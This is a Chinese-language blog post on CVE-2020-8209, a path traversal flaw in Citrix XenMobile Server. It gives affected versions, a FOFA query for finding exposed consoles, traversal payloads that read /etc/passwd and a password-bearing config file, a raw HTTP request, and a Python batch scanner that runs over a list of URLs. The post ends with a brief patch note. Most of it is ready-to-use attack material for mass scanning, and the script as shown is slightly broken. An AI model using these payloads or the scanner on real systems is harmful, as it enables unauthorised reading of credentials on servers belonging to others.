XenMobile是Citrix开发的企业移动性管理软件,该产品允许企业管理员工的移动设备和移动应用程序,该软件的目的是通过允许员工安全地在企业拥有的和个人移动设备及应用程序上工作来提高生产率。CVE-2020-8209,路径遍历漏洞。此漏洞允许未经授权的用户读取任意文件,包括包含密码的配置文件。(该软件国外居多,国内基本很少)
RP2之前的Citrix XenMobile Server 10.12,RP4之前的Citrix XenMobile Server 10.11,RP6之前的Citrix XenMobile Server 10.10和Citrix XenMobile Server 10.9 RP5之前的访问控制不当,从而导致能够读取任意文件。
0x01 影响版本
- RP2之前的XenMobile服务器10.12
- RP4之前的XenMobile服务器10.11
- RP6之前的XenMobile服务器10.10
- 10.9 RP5之前的XenMobile服务器
0x02 FOFA语法
app="XenMobile-控制台"
0x03 漏洞复现
POC:
/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd
/jsp/help-sb-download.jsp?sbFileName=../../../opt/sas/sw/config/sftu.properties数据包POC:
GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1
Host: xxx.xxx.xxx.xxx
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://fofa.so/result?qbase64=YXBwPSJYZW5Nb2JpbGUt5o6n5Yi25Y%2BwIiAmJiBjb3VudHJ5PSJERSI%3D
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
0x04 批量脚本
#!/usr/bin/env python
# coding:utf-8
import requests,sys,colorama
from colorama import *
init(autoreset=True)
def XenMobile():
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"}
payload= '/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd'
poc=urls+payload
try:
requests.packages.urllib3.disable_warnings()#解决InsecureRequestWarning警告
response=requests.get(poc,headers=headers,timeout=10,verify=False)
if response.status_code==200 and "root" in response.content:
print(u'�33[1;31;40m[+]{} 存在Citrix XenMobile 目录遍历漏洞'.format(urls))
else:
print('[-]{} None'.format(urls))
except:
print(u'{} 请求超时'.format(urls))
if __name__ == '__main__':
print (banner)
if len(sys.argv)!=2:
print('Example:python CVE-2020-8209-Multiple.py url.txt')
else:
file = open(sys.argv[1])
for url in file.readlines():
urls=url.strip()
XenMobile()
print ('Check Over')0x05 修复建议
官方补丁删除了/opt/sas/sw/tomcat/inst1/webapps/ROOT/jsp/help-sb-download.jsp
转载请注明:Adminxe's Blog » CVE-2020-8209(Citrix Endpoint Management )XenMobile-控制台存在任意文件读取漏洞